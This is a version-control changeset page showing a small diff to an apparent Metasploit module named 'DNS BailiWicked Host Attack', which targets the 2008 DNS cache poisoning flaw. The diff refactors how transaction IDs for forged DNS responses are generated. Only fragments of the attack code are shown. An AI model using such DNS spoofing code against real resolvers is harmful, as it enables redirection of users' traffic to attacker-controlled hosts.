Changeset 5585

Show
Ignore:
Timestamp:
07/23/08 18:09:21 (3 months ago)
Author:
hdm
Message:

Better XID mixing

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved

  • framework3/trunk/modules/auxiliary/spoof/dns/bailiwicked_host.rb

    r5584 r5585  
    1212        def initialize(info = {}) 
    1313                super(update_info(info,  
    14                         'Name'           => 'DNS BailiWicked Attack', 
     14                        'Name'           => 'DNS BailiWicked Host Attack', 
    1515                        'Description'    => %q{ 
    1616                                This exploit attacks a fairly ubiquitous flaw in DNS implementations which  
     
    133133                xids     = datastore['XIDS'].to_i 
    134134                ttl      = datastore['TTL'].to_i 
     135                xidbase  = rand(4)+2*10000 
    135136 
    136137                domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0] 
     
    273274                        req.ra = 1 
    274275 
    275                         p = rand(4)+2*10000 
    276                         p.upto(p+xids-1) do |id| 
     276                        xidbase.upto(xidbase+xids-1) do |id| 
    277277                                req.id = id 
    278278                                barbs.each do |barb|